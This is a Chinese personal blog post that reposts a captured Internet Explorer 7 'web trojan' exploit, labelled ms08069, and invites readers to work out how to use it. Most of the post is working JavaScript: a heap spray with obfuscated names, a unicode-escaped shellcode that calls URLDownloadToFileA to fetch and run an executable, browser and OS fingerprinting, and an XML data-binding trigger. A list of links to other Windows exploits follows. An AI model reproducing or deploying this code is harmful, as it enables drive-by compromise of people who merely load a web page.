夜火博客 个人的碎碎念收集箱

ms08069利用代码exploit 网马

话说这个 ms08069利用代码exploit 网马 代码好像和夜火我昨天发的IE7漏洞0day exploit的代码差不多,对代码这一块,我也不是很懂,发出来也只是给大家看,我自己没什么能力研究哈~,大家自行辨认。

cnhulk的自留地

据说有人已经发出来了,俺也把俺昨天抓的那个发出来吧。

如何用就自己拿去研究好了,自己小解了一下。

<script>
function sleep(milliseconds)
{
var start=new Date().getTime();
for(var i=0;i<1e7;i++)
{
   if((new Date().getTime()-start)>milliseconds)
   {
    break
   }
}
}function spray(sc)
{
var bwkbnwvojsqweyvwgabdlie=0x0a0a0a0a;
var bwkbnwvojsqweyvwgabdlieyqfbygrgz=unescape;
var asdfkj129312asdfasd=bwkbnwvojsqweyvwgabdlieyqfbygrgz(sc);
var heapBlockSize=0x100000;
var payLoadSize=asdfkj129312asdfasd.length*2;
var szlong=heapBlockSize-(payLoadSize+0x038);
var retVal=bwkbnwvojsqweyvwgabdlieyqfbygrgz("%u0a0a%u0a0a");
retVal=getSampleValue(retVal,szlong);
aaablk=(bwkbnwvojsqweyvwgabdlie-0x100000)/heapBlockSize;
zzchuck=new Array();
for(i=0;i<aaablk;i++)
{
   zzchuck[i]=retVal+asdfkj129312asdfasd
}
}
function getSampleValue(retVal,szlong)
{
while(retVal.length*2<szlong)
{
   retVal+=retVal
}retVal=retVal.substring(0,szlong/2);
return retVal
}var a1="%u";
spray("%u56e8%u0000%u5300%u5655%u8b57%u246c%u8b18%u3c45%u548b%u7805%uea01%u4a8b%u8b18%u205a%ueb01%u32e3%u8b49%u8b34%uee01%uff31%u31fc%uacc0%ue038%u0774%ucfc1%u010d%uebc7%u3bf2%u247c%u7514%u8be1%u245a%ueb01%u8b66%u4b0c%u5a8b%u011c%u8beb%u8b04%ue801%u02eb%uc031%u5e5f%u5b5d%u08c2%u5e00%u306a%u6459%u198b%u5b8b%u8b0c%u1c5b%u1b8b%u5b8b%u5308%u8e68%u0e4e%uffec%u89d6%u53c7%u8e68%u0e4e%uffec%uebd6%u5a50%uff52%u89d0%u52c2%u5352%uaa68%u0dfc%uff7c%u5ad6%u4deb%u5159%uff52%uebd0%u5a72%u5beb%u6a59%u6a00%u5100%u6a52%uff00%u53d0%ua068%uc9d5%uff4d%u5ad6%uff52%u53d0%u9868%u8afe%uff0e%uebd6%u5944%u006a%uff51%u53d0%u7e68%ue2d8%uff73%u6ad6%uff00%ue8d0%uffab%uffff%u7275%u6d6c%u6e6f%u642e%u6c6c%ue800%uffae%uffff%u5255%u444c%u776f%u6c6e%u616f%u5464%u466f%u6c69%u4165%ue800%uffa0%uffff%u2e2e%u765c%ue800%uffb7%uffff%u2e2e%u765c%ue800%uff89%uffff%u7468%u7074%u2f3a%u6c2f%u636f%u6c61%u6f68%u7473%u632f%u6c61%u2e63%u7865%u0065");
sleep(2000);
nav=navigator.userAgent.toLowerCase();
if(navigator.appVersion.indexOf('MSIE')!=-1)
{
version=parseFloat(navigator.appVersion.split('MSIE')[1])
}if(version==7)
{
w2k3=((nav.indexOf('windows nt 5.2')!=-1)||(nav.indexOf('windows 2003')!=-1));
wxp=((nav.indexOf('windows nt 5.1')!=-1)||(nav.indexOf('windows xp')!=-1));
if(wxp||w2k3)document.write('<XML ID=I><X><C><![CDATA[<image SRC=http://&#254;&#2570;&#114;.test.net src=http://www.google.com]]><![CDATA[>]]></C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML><XML ID=I></XML><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>');
var i=1;
while(i<=10)
{
   window.status=" ";
   i++
}
}
</script>

相关:
MS08-068 Exploit -SmbRelay3 NTLM Replay Attack Tool/Exploit
MS08-067漏洞批量检测程序-MS08-067 check
MS08-067 Exploit for CN 2k/xp/2003 .net version
MS08-067 Exploit for CN 2k/xp/2003 bypass version
ms08-066 Exploit
MS08-052 - MS Windows GDI+ Proof of Concept
MS08-046 - MS Windows InternalOpenColorProfile Heap Overflow PoC
ms08025 分析 Windows的内核漏洞

留言列表
发表评论
来宾的头像